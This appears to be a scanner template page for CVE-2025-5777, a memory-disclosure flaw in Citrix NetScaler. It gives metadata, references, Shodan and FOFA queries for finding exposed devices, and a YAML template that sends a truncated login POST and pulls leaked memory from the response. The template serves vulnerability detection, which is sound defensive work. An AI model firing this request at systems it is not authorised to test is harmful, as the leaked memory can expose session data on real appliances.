Citrix NetScaler Memory Disclosure - CitrixBleed 2
CVE-2025-5777
Early Release
Description
Insufficient input validation leading to memory overread on the NetScaler Management Interface NetScaler ADC and NetScaler Gateway
Severity
Critical
Exploit Probability
0%
Published Date
July 5, 2025
Template Author
watchtowr, dhiyaneshdk, darses
CVE-2025-5777.yaml
id: CVE-2025-5777 info: name: Citrix NetScaler Memory Disclosure - CitrixBleed 2 author: watchtowr,DhiyaneshDk,darses severity: critical description: | Insufficient input validation leading to memory overread on the NetScaler Management Interface NetScaler ADC and NetScaler Gateway reference: - https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX693420 - https://labs.watchtowr.com/how-much-more-must-we-bleed-citrix-netscaler-memory-disclosure-citrixbleed-2-cve-2025-5777/ - https://nvd.nist.gov/vuln/detail/CVE-2025-5777 classification: epss-score: 0.00042 epss-percentile: 0.12361 metadata: verified: true max-request: 1 shodan-query: - title:"NetScaler Gateway" - title:"NetScaler AAA" - http.favicon.hash:-1166125415 - http.favicon.hash:-1292923998 fofa-query: - title="NetScaler Gateway" - title="NetScaler AAA" - icon_hash="-1166125415" - icon_hash="-1292923998" tags: cve,cve2025,netscaler,citrix,exposure http: - raw: - |+ POST /p/u/doAuthentication.do HTTP/1.0 Host: {{Hostname}} bleed_attack: {{iteration}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 5 login unsafe: true payloads: iteration: - "{{rand_int(1,5)}}" extractors: - type: regex name: iv part: body regex: - '<InitialValue>([^<]{10,})</InitialValue>' internal: true stop-at-first-match: true matchers: - type: dsl dsl: - 'len(iv) > 0' - 'contains(to_lower(header), "application/vnd.citrix.authenticateresponse")' - '!contains(to_string(iv), "false")' - '!contains(to_string(iv), "true")' - '!contains(to_string(iv), "<InitialValue></InitialValue>")' condition: and # digest: 4a0a0047304502206b67756161e3b05759fd9b89e48fc20df8b936eb68641538bf775f6622acb3cb022100a66c907bf2dc255cf92f5d45b38725b3fb77795d037772f710e8f78ed0c503bd:922c64590222798bb761d5b6d8e72950